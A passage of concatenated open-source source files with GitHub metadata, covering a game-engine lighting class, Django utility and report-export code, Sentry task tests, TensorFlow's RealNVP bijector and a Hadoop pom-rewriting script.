This class keeps a constant number of lights active at all times, but sets the unnecessary extra lights to have no effect."""
def __init__(self, color, attenuation):
self.color = Vec4(color)
self.attenuation = Vec3(attenuation)
self.position = Vec3(0, 0, 0)
self.node = None
def setPos(self, pos):
self.position = Vec3(pos)
if self.node != None:
self.node[1].setPos(self.position)
def setColor(self, color):
self.color = Vec4(color)
if self.node != None:
self.node[0].setColor(self.color)
def setAttenuation(self, attenuation):
"Attenuation is a 3D vector containing quadratic, linear, and constant attenuation coefficients."
self.attenuation = Vec3(attenuation)
if self.node != None:
self.node[0].setAttenuation(self.attenuation)
def add(self):
"Adds this light to the active light list, basically enabling it."
if not self in lights:
lights.append(self)
if len(lights) <= len(lightNodes) and self.node == None:
self.node = lightNodes[len(lights) - 1]
self.node[1].setPos(self.position)
self.node[0].setColor(self.color)
self.node[0].setAttenuation(self.attenuation)
def remove(self):
"Removes this light from the active light list, disabling it."
if self in lights:
lights.remove(self)
if self.node != None:
self.node[0].setColor(Vec4(0, 0, 0, 1))
self.node[0].setAttenuation(Vec3(0, 0, 1))
self.node = None
def impulseToForce(fx, fy = None, fz = None):
"Converts an impulse to a force (either a vector or a scalar) by dividing by the timestep of the last ODE frame."
if fy != None and fz != None:
force = Vec3(fx, fy, fz)
return force / clock.timeStep
else:
return fx / clock.timeStep
def frange(start, end=None, inc=None):
"A range function that accepts float increments."
if end == None:
end = start + 0.0
start = 0.0
else: start += 0.0 # force it to be a float
if inc == None:
inc = 1.0
count = int(math.ceil((end - start) / inc))
L = [None,] * count
L[0] = start
for i in xrange(1,count):
L[i] = L[i-1] + inc
return L
def lerp(a, b, scale):
"Interpolate between two Vec3's, based on the 'scale' parameter, where 'scale' goes from 0 to 1."
return a + ((b - a) * scale)
| {
"content_hash": "49ad52a508a2370051e326a0a6d6408d",
"timestamp": "",
"source": "github",
"line_count": 1052,
"max_line_length": 467,
"avg_line_length": 35.70342205323194,
"alnum_prop": 0.6960330138445154,
"repo_name": "etodd/a3p",
"id": "c7546d5760a12ba79c117162194ecfbe0546cdaa",
"size": "37560",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/engine.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "2056"
},
{
"name": "PHP",
"bytes": "3901"
},
{
"name": "Python",
"bytes": "374487"
},
{
"name": "Shell",
"bytes": "1084"
}
],
"symlink_target": ""
} |
import os, re, json
from django.utils.encoding import smart_str
from django.utils import six
from protoExt.utils.utilsConvert import slugify2
def compare_dictionaries(dict1, dict2):
"""
Object (dict) comparaison
"""
# return 0 if x==y else (-1 if x<y else 1)
if dict1 == None or dict2 == None:
return False
if type(dict1) is not dict or type(dict2) is not dict:
return False
if dict1.__eq__( dict2 ):
return True
shared_keys = set(dict2.keys()) & set(dict2.keys())
if not ( len(shared_keys) == len(dict1.keys()) and len(shared_keys) == len(dict2.keys())):
return False
dicts_are_equal = True
for key in dict1.keys():
if type(dict1[key]) != type(dict2[key]):
dicts_are_equal = False
elif type(dict1[key]) is dict:
dicts_are_equal = compare_dictionaries(dict1[key],dict2[key])
elif type(dict1[key]) is list:
dicts_are_equal = compare_lists( dict1[key], dict2[key] )
else:
dicts_are_equal = (dict1[key] == dict2[key])
if not dicts_are_equal:
return False
return dicts_are_equal
def compare_lists(list1, list2):
"""
Minimal list comparaison,
Las listas deben venir en el mismo orden
"""
if len( list1 ) != len( list2 ):
return False
if len( list1 ) == 0:
return True
if list1.__eq__( list2 ):
return True
lists_are_equal = True
for ix in range(len(list1)):
if list1[ix] in list2 :
continue
if type( list1[ix] ) != type( list2[ix] ):
lists_are_equal = False
elif type(list1[ix]) is dict:
lists_are_equal = compare_dictionaries(list1[ix],list2[ix])
elif type(list1[ix]) is list:
lists_are_equal = compare_lists( list1[ix], list2[ix] )
else:
lists_are_equal = (list1[ix] == list2[ix])
if not lists_are_equal:
return False
return lists_are_equal
def traceError():
from django.conf import settings
if settings.DEBUG:
import traceback
traceback.print_exc()
else:
import logging
logging.basicConfig( filename = settings.LOG_FILE, level=logging.DEBUG)
logging.info("Exception has occured" ,exc_info=1)
def random_string_generator(size=6, chars=None):
import string, random
if not chars: chars = string.ascii_uppercase
return ''.join(random.choice(chars) for x in range(size)) # @UnusedVariable
def verifyList(obj, defList = None):
# obj [ list, str, tuple ]
# Los objetos del admin son en su mayoria del tipo tuple,
# Es necesario convertirlos a listas por facilidad de trabajo
if isinstance( obj , six.string_types ):
try:
obj = json.loads(obj)
except :
obj = []
elif isinstance( obj, tuple ):
obj = list( obj )
if not isinstance( obj, list ):
obj = []
if defList is not None and len( obj ) == 0 :
return defList
return obj
def verifyStr( vrBase , vrDefault ):
sAux = vrBase or vrDefault
return u'%s' % sAux
def parseEmailAddress(fullemail, delimitorLeft = '<', delimitorRight = '>'):
"""
split a full name/email pair to name/email tuple
matches :
# julien@bouquillon.com
# Julien Bouquillon <julien@bouquillon.com>
"""
if delimitorLeft == '(':
delimitorLeft = '\\('
if delimitorRight == ')':
delimitorRight = '\\)'
reg = re.compile('([^%s\n]+) ?%s?([^%s\r\n]+)?%s?' % (delimitorLeft, delimitorLeft, delimitorRight, delimitorRight) )
matches = reg.findall(fullemail)
if matches:
(name, email) = matches[0]
if email == '':
email = name
return (name, email)
return None
def guessNextPath(dst, slugify2 = True, idx = 0, checkExists = True):
""" return a renamed path if provided one already exists
if slugify2, file name is slugified first (fs encodings problems quick & dirty workaround)
"""
newpath = dst
if idx == 0:
(path, file) = os.path.split(newpath)
(file, ext) = os.path.splitext(file)
slug = slugify2(file)
newpath = os.path.join(path, '%s%s' % (slug, ext))
if checkExists and os.path.isfile(newpath):
idx += 1
name, ext = os.path.splitext(newpath)
newpath = '%s-copy%s' % (name, ext)
return guessNextPath(newpath, slugify2, idx, checkExists)
return newpath
def unique_id(more = ''):
import time
a = str(time.time())
import random
a += '-%s' % str(random.randint(2000, 10000))
a += '-%s' % str(random.randint(0, 2000))
a += more
return a
def reduceDict(old_dict, keep_keys):
""" keep only keep_keys in the dict (return a new one)
old_dict : {}
keep_keys : []
"""
return { keep_k: old_dict[keep_k] for keep_k in keep_keys }
def dict2tuple(indict):
atuple = tuple()
for item in indict:
atuple += ((item, indict[item]),)
#print atuple
return atuple
def list2dict(alist , key ):
# Convierte una lista de objetos en dict usando key como llave del dict.
aDict = {}
for item in alist:
#Verifica si es un dict
if isinstance( item, dict ):
aDict[ item[key] ] = item
# si es un string lo crea con el key por defecto
elif isinstance( item, str ):
aDict[ item ] = { key : { key : item }}
return aDict
def CleanFilePath(inFileName):
""" assure qu'un nom de fichier n'est bien qu'un nom de fichier (remove slashes) """
inFileName = os.path.basename(inFileName)
inFileName = inFileName.replace('/', '')
inFileName = inFileName.replace('\\', '')
return inFileName
def CheckPathSecurity(testPath, rootPath):
if not os.path.realpath(testPath).startswith(rootPath):
raise Exception("forbidden path %s !" % os.path.realpath(testPath))
def PathToList(inPath, template_type="", showExt = True):
mylist = []
for file in os.listdir(inPath):
if file in ['.', '..', '']:
continue
if not os.path.isfile(os.path.join(inPath, file)):
continue
if not showExt:
file = os.path.splitext(file)[0]
mydict = {"name": file, "type": template_type}
mylist.append(mydict)
return mylist
def strip_html(inHtml):
# regularExp
# import re
inHtml = re.sub(r'<br>', '\n', inHtml)
inHtml = re.sub(r'</td><td>', ' - ', inHtml)
inHtml = re.sub(r'</tr>', '\n\n', inHtml)
inHtml = re.sub(r'</table>', '\n\n', inHtml)
inHtml = re.sub(r'</p>', '\n\n', inHtml)
inHtml = re.sub(r'<[^>]*?>', '', inHtml)
inHtml = re.sub(r'<style>[^>]*</style>', '', inHtml)
return inHtml
def strip_accents(inStr):
inStr = u'%s' % inStr
drep = {}
drep["e"] = u'éêèë'
drep["a"] = u'àâä'
drep["i"] = u'îï'
drep["c"] = u'ç'
drep["u"] = u'ùû'
drep["o"] = u'ôòö'
drep["E"] = u'ÉÊÈË'
drep["A"] = u'ÀÂÄ'
drep["I"] = u'ÎÏ'
drep["C"] = u'Ç'
drep["U"] = u'ÙÛ'
drep["O"] = u'ÔÒÖ'
for k in drep.keys():
for ch in drep[k]:
inStr = inStr.replace(ch, k)
# De todas formas lo estandariza
return slugify2( inStr )
def strip_euro(inStr):
inStr = u'%s' % inStr
inStr = inStr.replace(u'€', u'euro(s)')
return inStr
# Utilizado para campos q no tienen relacion en el modelo,
class VirtualField(object):
def __init__(self, name):
self.name = name
def getReadableError( e ):
sAux = '<b>ErrType:</b> ' + type( e ).__name__ + '<br>'
sAux += smart_str( e )
# if len( e.args ) > 1: sAux += '<br>' + str( '; '.join( e.args ))
return sAux + '<br>'
def strNotNull( sValue, sDefault ):
if (sValue is None):
if (sDefault is None):
return "_"
else:
return sDefault
else:
return sValue
def copyProps ( objBase, objNew ):
"Adiciona las propiedades a un objeto base igual q Ext.apply "
"Todo: xxx.update : un metodo directo para hacerlo destination.__dict__.update(source.__dict__) "
for mProp in objNew:
objBase[ mProp ] = objNew[ mProp ]
return objBase
def copyModelProps ( objfrom, objto, props ):
"""copia valores de una instancia de modelo a otro
"""
for n in props:
if hasattr(objfrom, n):
v = getattr(objfrom, n)
try:
setattr(objto, n, v);
except:
continue
return objto
import unicodedata
def stripAccents(s):
return ''.join((c for c in unicodedata.normalize('NFD', s) if unicodedata.category(c) != 'Mn'))
def explode(s):
''' Uso:
explode( 'fName(p1,p2)' )
['fName', 'p1,p2']
alternativas mas poderosas
http://docs.python.org/2/library/ast.html#ast.parse
import re
'''
pattern = r'(\w[\w\d_]*)\((.*)\)$'
match = re.match(pattern, s)
if match:
return list(match.groups())
else:
return []
def repStr(string_to_expand, length):
#Repeat to length ( indent, fill, ... )
return (string_to_expand * ((length/len(string_to_expand))+1))[:length]
class Enum(tuple):
"""
How to use it (forward and reverse lookup, keys, values, items, etc.)
>>> State = Enum(['Unclaimed', 'Claimed'])
>>> State.Claimed
1
>>> State[1]
'Claimed'
>>> State
('Unclaimed', 'Claimed')
>>> range(len(State))
[0, 1]
>>> [(k, State[k]) for k in range(len(State))]
[(0, 'Unclaimed'), (1, 'Claimed')]
>>> [(k, getattr(State, k)) for k in State]
[('Unclaimed', 0), ('Claimed', 1)]
"""
__getattr__ = tuple.index
def getClassName( cName ):
# Formatea un string tipo titulo
return ''.join( slugify2( cName ).title().split('-') )
| {
"content_hash": "a345ca9a5e639efb807d085c8279988e",
"timestamp": "",
"source": "github",
"line_count": 404,
"max_line_length": 121,
"avg_line_length": 24.68811881188119,
"alnum_prop": 0.5658712652897534,
"repo_name": "DarioGT/docker-carra",
"id": "72d82c22c867a5db81b86fd808f7898ca781da93",
"size": "10092",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/protoExt/utils/utilsBase.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "64175"
},
{
"name": "Dockerfile",
"bytes": "739"
},
{
"name": "HTML",
"bytes": "14125"
},
{
"name": "JavaScript",
"bytes": "21266785"
},
{
"name": "Makefile",
"bytes": "433"
},
{
"name": "Python",
"bytes": "851053"
},
{
"name": "Shell",
"bytes": "2934"
},
{
"name": "Visual Basic",
"bytes": "7788"
}
],
"symlink_target": ""
} |
from django.core.exceptions import ImproperlyConfigured
from django.shortcuts import render_to_response
from django.template.context import RequestContext
from django.http import HttpResponse
from django.utils.encoding import smart_unicode
import csv
from cStringIO import StringIO
from xml.etree import ElementTree as ET
## Exporting to XLS requires the xlwt library
## http://www.python-excel.org/
try:
import xlwt
XLS_AVAILABLE = True
except ImportError:
XLS_AVAILABLE = False
class OutputFormat(object):
verbose_name="Abstract Output Format"
slug="output"
no_paging=False
def generate_output(self, context, output):
## output is expected to be a file-like object, be it Django Response,
## StringIO, file, or sys.stdout. Anything sith a .write method should do.
raise NotImplemented("Use a subclass of OutputFormat.")
def get_response(self,context,request):
raise NotImplemented("Use a subclass of OutputFormat.")
class AdminOutputFormat(OutputFormat):
verbose_name="Admin Report"
slug="admin"
def generate_output(self, context, output):
raise NotImplemented("Not necessary for this output format")
def get_response(self,context,request):
context.update({"output_format":self})
return render_to_response('reportengine/report.html', context,
context_instance=RequestContext(request))
class CSVOutputFormat(OutputFormat):
verbose_name="CSV (comma separated value)"
slug="csv"
no_paging=True
# CONSIDER perhaps I could use **kwargs, but it is nice to see quickly what is available..
def __init__(self,quotechar='"',quoting=csv.QUOTE_MINIMAL,delimiter=',',lineterminator='\n'):
self.quotechar=quotechar
self.quoting=quoting
self.delimiter=delimiter
self.lineterminator=lineterminator
def generate_output(self, context, output):
"""
:param context: should be a dictionary with keys 'aggregates' and 'rows' and 'report'
:param output: should be a file-like object to which output can be written?
:return: modified output object
"""
w=csv.writer(output,
delimiter=self.delimiter,
quotechar=self.quotechar,
quoting=self.quoting,
lineterminator=self.lineterminator)
for a in context["aggregates"]:
w.writerow([smart_unicode(x).encode('utf8') for x in a])
w.writerow( context["report"].labels)
for r in context["rows"]:
w.writerow([smart_unicode(x).encode('utf8') for x in r])
return output
def get_response(self,context,request):
resp = HttpResponse(mimetype='text/csv')
# CONSIDER maybe a "get_filename" from the report?
resp['Content-Disposition'] = 'attachment; filename=%s.csv'%context['report'].slug
self.generate_output(context, resp)
return resp
class XLSOutputFormat(OutputFormat):
no_paging = True
slug = 'xls'
verbose_name = 'XLS (Microsoft Excel)'
def generate_output(self, context, output):
if not XLS_AVAILABLE:
raise ImproperlyConfigured('Missing module xlwt.')
## Put all our data into a big list
rows = []
rows.extend(context['aggregates'])
rows.append(context['report'].labels)
rows.extend(context['rows'])
## Create the spreadsheet from our data
workbook = xlwt.Workbook(encoding='utf8')
worksheet = workbook.add_sheet('report')
for row_index, row in enumerate(rows):
for col_index, val in enumerate(row):
if isinstance(val, basestring):
val = smart_unicode(val).encode('utf8')
worksheet.write(row_index, col_index, val)
workbook.save(output)
def get_response(self, context, request):
resp = HttpResponse(mimetype='application/vnd.ms-excel')
resp['Content-Disposition'] = 'attachment; filename=%s.xls' % context['report'].slug
self.generate_output(context, resp)
return resp
class XMLOutputFormat(OutputFormat):
verbose_name="XML"
slug="xml"
no_paging=True
def __init__(self,root_tag="output",row_tag="entry",aggregate_tag="aggregate"):
self.root_tag=root_tag
self.row_tag=row_tag
self.aggregate_tag=aggregate_tag
def generate_output(self, context, output):
root = ET.Element(self.root_tag) # CONSIDER maybe a nicer name or verbose name or something
for a in context["aggregates"]:
ae=ET.SubElement(root,self.aggregate_tag)
ae.set("name",a[0])
ae.text=smart_unicode(a[1])
rows=context["rows"]
labels=context["report"].labels
for r in rows:
e=ET.SubElement(root,self.row_tag)
for l in range(len(labels)):
e1=ET.SubElement(e,labels[l])
e1.text = smart_unicode(r[l])
tree=ET.ElementTree(root)
tree.write(output)
def get_response(self,context,request):
resp = HttpResponse(mimetype='text/xml')
# CONSIDER maybe a "get_filename" from the report?
resp['Content-Disposition'] = 'attachment; filename=%s.xml'%context['report'].slug
self.generate_output(context, resp)
return resp
| {
"content_hash": "de3f3c7ccbc260ad15c41931493fc69c",
"timestamp": "",
"source": "github",
"line_count": 144,
"max_line_length": 99,
"avg_line_length": 37.34027777777778,
"alnum_prop": 0.6440394271898828,
"repo_name": "dmpayton/django-reportengine",
"id": "a3258c0a38413de1f89387ee512459f54a3582d1",
"size": "5377",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "reportengine/outputformats.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "10143"
},
{
"name": "Python",
"bytes": "89815"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
from mock import Mock, patch
from sentry.models import EventTag, TagKey, TagValue
from sentry.testutils import TestCase
from sentry.tasks.merge import merge_group
from sentry.tasks.post_process import index_event_tags, post_process_group
class PostProcessGroupTest(TestCase):
@patch('sentry.tasks.post_process.record_affected_user', Mock())
@patch('sentry.rules.processor.RuleProcessor')
def test_rule_processor(self, mock_processor):
group = self.create_group(project=self.project)
event = self.create_event(group=group)
mock_callback = Mock()
mock_futures = [Mock()]
mock_processor.return_value.apply.return_value = [
(mock_callback, mock_futures),
]
post_process_group(
event=event,
is_new=True,
is_regression=False,
is_sample=False,
)
mock_processor.assert_called_once_with(event, True, False, False)
mock_processor.return_value.apply.assert_called_once_with()
mock_callback.assert_called_once_with(event, mock_futures)
@patch('sentry.tasks.post_process.record_affected_user', Mock())
@patch('sentry.rules.processor.RuleProcessor')
def test_group_refresh(self, mock_processor):
group1 = self.create_group(project=self.project)
group2 = self.create_group(project=self.project)
event = self.create_event(group=group1)
assert event.group_id == group1.id
assert event.group == group1
with self.tasks():
merge_group(group1.id, group2.id)
mock_callback = Mock()
mock_futures = [Mock()]
mock_processor.return_value.apply.return_value = [
(mock_callback, mock_futures),
]
post_process_group(
event=event,
is_new=True,
is_regression=False,
is_sample=False,
)
assert event.group == group2
assert event.group_id == group2.id
class IndexEventTagsTest(TestCase):
def test_simple(self):
group = self.create_group(project=self.project)
event = self.create_event(group=group)
with self.tasks():
index_event_tags.delay(
event_id=event.id,
group_id=group.id,
project_id=self.project.id,
tags=[('foo', 'bar'), ('biz', 'baz')],
)
tags = list(EventTag.objects.filter(
event_id=event.id,
).values_list('key_id', 'value_id'))
assert len(tags) == 2
tagkey = TagKey.objects.get(
key='foo',
project=self.project,
)
tagvalue = TagValue.objects.get(
key='foo',
value='bar',
project=self.project,
)
assert (tagkey.id, tagvalue.id) in tags
tagkey = TagKey.objects.get(
key='biz',
project=self.project,
)
tagvalue = TagValue.objects.get(
key='biz',
value='baz',
project=self.project,
)
assert (tagkey.id, tagvalue.id) in tags
# ensure it safely handles repeat runs
with self.tasks():
index_event_tags.delay(
event_id=event.id,
group_id=group.id,
project_id=self.project.id,
tags=[('foo', 'bar'), ('biz', 'baz')],
)
queryset = EventTag.objects.filter(
event_id=event.id,
)
assert queryset.count() == 2
| {
"content_hash": "a8376139e2141a3e8920aa25e91e9021",
"timestamp": "",
"source": "github",
"line_count": 120,
"max_line_length": 74,
"avg_line_length": 29.875,
"alnum_prop": 0.5690376569037657,
"repo_name": "mitsuhiko/sentry",
"id": "f649c898c66fd737100f5a02127270c0f8023935",
"size": "3610",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "tests/sentry/tasks/post_process/tests.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "JavaScript",
"bytes": "171113"
},
{
"name": "Python",
"bytes": "877258"
}
],
"symlink_target": ""
} |
"""Real NVP bijector."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import ops
from tensorflow.python.layers import core as layers
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import template as template_ops
from tensorflow.python.ops.distributions import bijector as bijector_lib
__all__ = [
"RealNVP",
"real_nvp_default_template"
]
class RealNVP(bijector_lib.Bijector):
"""RealNVP "affine coupling layer" for vector-valued events.
Real NVP models a normalizing flow on a `D`-dimensional distribution via a
single `D-d`-dimensional conditional distribution [1]:
`y[d:D] = y[d:D] * math_ops.exp(log_scale_fn(y[d:D])) + shift_fn(y[d:D])`
`y[0:d] = x[0:d]`
The last `D-d` units are scaled and shifted based on the first `d` units only,
while the first `d` units are 'masked' and left unchanged. Real NVP's
`shift_and_log_scale_fn` computes vector-valued quantities. For
scale-and-shift transforms that do not depend on any masked units, i.e.
`d=0`, use the `tfb.Affine` bijector with learned parameters instead.
Masking is currently only supported for base distributions with
`event_ndims=1`. For more sophisticated masking schemes like checkerboard or
channel-wise masking [2], use the `tfb.Permute` bijector to re-order desired
masked units into the first `d` units. For base distributions with
`event_ndims > 1`, use the `tfb.Reshape` bijector to flatten the event shape.
Recall that the MAF bijector [2] implements a normalizing flow via an
autoregressive transformation. MAF and IAF have opposite computational
tradeoffs - MAF can train all units in parallel but must sample units
sequentially, while IAF must train units sequentially but can sample in
parallel. In contrast, Real NVP can compute both forward and inverse
computations in parallel. However, the lack of an autoregressive
transformations makes it less expressive on a per-bijector basis.
A "valid" `shift_and_log_scale_fn` must compute each `shift` (aka `loc` or
"mu" [2]) and `log(scale)` (aka "alpha" [2]) such that each are broadcastable
with the arguments to `forward` and `inverse`, i.e., such that the
calculations in `forward`, `inverse` [below] are possible. For convenience,
`real_nvp_default_nvp` is offered as a possible `shift_and_log_scale_fn`
function.
NICE [3] is a special case of the Real NVP bijector which discards the scale
transformation, resulting in a constant-time inverse-log-determinant-Jacobian.
To use a NICE bijector instead of Real NVP, `shift_and_log_scale_fn` should
return `(shift, None)`, and `is_constant_jacobian` should be set to `True` in
the `RealNVP` constructor. Calling `real_nvp_default_template` with
`shift_only=True` returns one such NICE-compatible `shift_and_log_scale_fn`.
Caching: the scalar input depth `D` of the base distribution is not known at
construction time. The first call to any of `forward(x)`, `inverse(x)`,
`inverse_log_det_jacobian(x)`, or `forward_log_det_jacobian(x)` memoizes
`D`, which is re-used in subsequent calls. This shape must be known prior to
graph execution (which is the case if using tf.layers).
#### Example Use
```python
tfd = tf.contrib.distributions
tfb = tfd.bijectors
# A common choice for a normalizing flow is to use a Gaussian for the base
# distribution. (However, any continuous distribution would work.) E.g.,
nvp = tfd.TransformedDistribution(
distribution=tfd.MultivariateNormalDiag(loc=[0., 0., 0.])),
bijector=tfb.RealNVP(
num_masked=2,
shift_and_log_scale_fn=tfb.real_nvp_default_template(
hidden_layers=[512, 512])))
x = nvp.sample()
nvp.log_prob(x)
nvp.log_prob(0.)
```
For more examples, see [4].
[1]: "Density Estimation using Real NVP."
Laurent Dinh, Jascha Sohl-Dickstein, Samy Bengio. ICLR. 2017.
https://arxiv.org/abs/1605.08803
[2]: "Masked Autoregressive Flow for Density Estimation."
George Papamakarios, Theo Pavlakou, Iain Murray. Arxiv. 2017.
https://arxiv.org/abs/1705.07057
[3]: "NICE: Non-linear Independent Components Estimation."
Laurent Dinh, David Krueger, Yoshua Bengio. ICLR. 2015.
https://arxiv.org/abs/1410.8516
[4]: "Normalizing Flows Tutorial, Part 2: Modern Normalizing Flows."
Eric Jang. Blog post. January 2018.
http://blog.evjang.com/2018/01/nf2.html
"""
def __init__(self,
num_masked,
shift_and_log_scale_fn,
is_constant_jacobian=False,
validate_args=False,
name=None):
"""Creates the Real NVP or NICE bijector.
Args:
num_masked: Python `int` indicating that the first `d` units of the event
should be masked. Must be in the closed interval `[1, D-1]`, where `D`
is the event size of the base distribution.
shift_and_log_scale_fn: Python `callable` which computes `shift` and
`log_scale` from both the forward domain (`x`) and the inverse domain
(`y`). Calculation must respect the "autoregressive property" (see class
docstring). Suggested default
`masked_autoregressive_default_template(hidden_layers=...)`.
Typically the function contains `tf.Variables` and is wrapped using
`tf.make_template`. Returning `None` for either (both) `shift`,
`log_scale` is equivalent to (but more efficient than) returning zero.
is_constant_jacobian: Python `bool`. Default: `False`. When `True` the
implementation assumes `log_scale` does not depend on the forward domain
(`x`) or inverse domain (`y`) values. (No validation is made;
`is_constant_jacobian=False` is always safe but possibly computationally
inefficient.)
validate_args: Python `bool` indicating whether arguments should be
checked for correctness.
name: Python `str`, name given to ops managed by this object.
Raises:
ValueError: If num_masked < 1.
"""
name = name or "real_nvp"
if num_masked <= 0:
raise ValueError("num_masked must be a positive integer.")
self._num_masked = num_masked
# At construction time, we don't know input_depth.
self._input_depth = None
self._shift_and_log_scale_fn = shift_and_log_scale_fn
super(RealNVP, self).__init__(
event_ndims=1,
is_constant_jacobian=is_constant_jacobian,
validate_args=validate_args,
name=name)
def _cache_input_depth(self, x):
if self._input_depth is None:
self._input_depth = x.shape.with_rank_at_least(1)[-1].value
if self._input_depth is None:
raise NotImplementedError(
"Rightmost dimension must be known prior to graph execution.")
if self._num_masked >= self._input_depth:
raise ValueError(
"Number of masked units must be smaller than the event size.")
def _forward(self, x):
self._cache_input_depth(x)
# Performs scale and shift.
x0, x1 = x[:, :self._num_masked], x[:, self._num_masked:]
shift, log_scale = self._shift_and_log_scale_fn(
x0, self._input_depth - self._num_masked)
y1 = x1
if log_scale is not None:
y1 *= math_ops.exp(log_scale)
if shift is not None:
y1 += shift
y = array_ops.concat([x0, y1], axis=-1)
return y
def _inverse(self, y):
self._cache_input_depth(y)
# Performs un-shift and un-scale.
y0, y1 = y[:, :self._num_masked], y[:, self._num_masked:]
shift, log_scale = self._shift_and_log_scale_fn(
y0, self._input_depth - self._num_masked)
x1 = y1
if shift is not None:
x1 -= shift
if log_scale is not None:
x1 *= math_ops.exp(-log_scale)
x = array_ops.concat([y0, x1], axis=-1)
return x
def _inverse_log_det_jacobian(self, y):
self._cache_input_depth(y)
y0 = y[:, :self._num_masked]
_, log_scale = self._shift_and_log_scale_fn(
y0, self._input_depth - self._num_masked)
if log_scale is None:
return constant_op.constant(0., dtype=y.dtype, name="ildj")
return -math_ops.reduce_sum(log_scale, axis=-1)
def _forward_log_det_jacobian(self, x):
self._cache_input_depth(x)
x0 = x[:, :self._num_masked]
_, log_scale = self._shift_and_log_scale_fn(
x0, self._input_depth - self._num_masked)
if log_scale is None:
return constant_op.constant(0., dtype=x.dtype, name="ildj")
return math_ops.reduce_sum(log_scale, axis=-1)
def real_nvp_default_template(
hidden_layers,
shift_only=False,
activation=nn_ops.relu,
name=None,
*args,
**kwargs):
"""Build a scale-and-shift function using a multi-layer neural network.
This will be wrapped in a make_template to ensure the variables are only
created once. It takes the `d`-dimensional input x[0:d] and returns the `D-d`
dimensional outputs `loc` ("mu") and `log_scale` ("alpha").
Arguments:
hidden_layers: Python `list`-like of non-negative integer, scalars
indicating the number of units in each hidden layer. Default: `[512, 512].
shift_only: Python `bool` indicating if only the `shift` term shall be
computed (i.e. NICE bijector). Default: `False`.
activation: Activation function (callable). Explicitly setting to `None`
implies a linear activation.
name: A name for ops managed by this function. Default:
"real_nvp_default_template".
*args: `tf.layers.dense` arguments.
**kwargs: `tf.layers.dense` keyword arguments.
Returns:
shift: `Float`-like `Tensor` of shift terms (the "mu" in [2]).
log_scale: `Float`-like `Tensor` of log(scale) terms (the "alpha" in [2]).
Raises:
NotImplementedError: if rightmost dimension of `inputs` is unknown prior to
graph execution.
"""
with ops.name_scope(name, "real_nvp_default_template"):
def _fn(x, output_units):
"""Fully connected MLP parameterized via `real_nvp_template`."""
for units in hidden_layers:
x = layers.dense(
inputs=x,
units=units,
activation=activation,
*args,
**kwargs)
x = layers.dense(
inputs=x,
units=(1 if shift_only else 2) * output_units,
activation=None,
*args,
**kwargs)
if shift_only:
return x, None
shift, log_scale = array_ops.split(x, 2, axis=-1)
return shift, log_scale
return template_ops.make_template(
"real_nvp_default_template", _fn)
| {
"content_hash": "6a5cdc81b42d29235fc5f0dce184f41c",
"timestamp": "",
"source": "github",
"line_count": 268,
"max_line_length": 80,
"avg_line_length": 40.07835820895522,
"alnum_prop": 0.6692114328274835,
"repo_name": "av8ramit/tensorflow",
"id": "2840f52e742eac5e9e37a576bf7f6d6f05a07a35",
"size": "11430",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "tensorflow/contrib/distributions/python/ops/bijectors/real_nvp.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "9096"
},
{
"name": "C",
"bytes": "332331"
},
{
"name": "C++",
"bytes": "37144977"
},
{
"name": "CMake",
"bytes": "193247"
},
{
"name": "Go",
"bytes": "1061627"
},
{
"name": "HTML",
"bytes": "4680032"
},
{
"name": "Java",
"bytes": "544069"
},
{
"name": "Jupyter Notebook",
"bytes": "1940884"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "Makefile",
"bytes": "48122"
},
{
"name": "Objective-C",
"bytes": "12456"
},
{
"name": "Objective-C++",
"bytes": "94385"
},
{
"name": "PHP",
"bytes": "1487"
},
{
"name": "Perl",
"bytes": "6179"
},
{
"name": "Perl 6",
"bytes": "1357"
},
{
"name": "PureBasic",
"bytes": "24932"
},
{
"name": "Python",
"bytes": "32711532"
},
{
"name": "Ruby",
"bytes": "547"
},
{
"name": "Shell",
"bytes": "422931"
}
],
"symlink_target": ""
} |
'''
Reads the automatically generated Hadoop pom file, removes the "optional"
flag from dependencies so that they could be included transitively into other
projects such as HBase, and removes certain dependencies that are not required
and could even break the code (e.g. an old version of xerces). Writes the
modified project object model XML to standard output.
'''
import os
import re
import sys
import subprocess
from xml.dom.minidom import parse
NON_TRANSITIVE_DEPS = [
# Old version, breaks HBase
'xerces',
# Not used in production
'checkstyle',
'jdiff',
# A release audit tool, probably not used in prod
'rat-lib',
]
def get_output(doc):
out_lines = doc.toprettyxml(indent=' ' * 2)
lines = []
for l in out_lines.split('\n'):
l = l.rstrip()
if l:
lines.append(l)
output = '\n'.join(lines)
# Make sure values stay on the same line: <element>value</element>
output = re.sub(
r'(<([a-zA-Z]+)>)'
r'\s*([^<>]+?)\s*'
r'(</\2>)', r'\1\3\4', output)
return output
def branch_to_version_mapping(branch) :
# Do not update pom file unless its a hdfs RC.
if branch == 'default' or branch == 'trunk':
return -1
return ord(branch[0]) - ord('a') + 1
def modify_pom(pom_file, maven_version):
doc = parse(pom_file)
version = doc.getElementsByTagName('version')[0]
version.firstChild.nodeValue = maven_version
deps = doc.getElementsByTagName('dependencies')[0]
dep_version = deps.getElementsByTagName('dependency')[0].getElementsByTagName('version')[0]
dep_version.firstChild.nodeValue = maven_version
f1=open(pom_file, 'w+')
f1.write(get_output(doc))
f1.close()
POM_FILE = 'build/ivy/maven/generated.pom'
doc = parse(POM_FILE)
deps = doc.getElementsByTagName('dependencies')[0]
for dep in deps.getElementsByTagName('dependency'):
for c in dep.childNodes:
if (c.nodeName == 'artifactId' and
c.firstChild and
c.firstChild.nodeValue and
c.firstChild.nodeValue.strip() in NON_TRANSITIVE_DEPS):
deps.removeChild(dep)
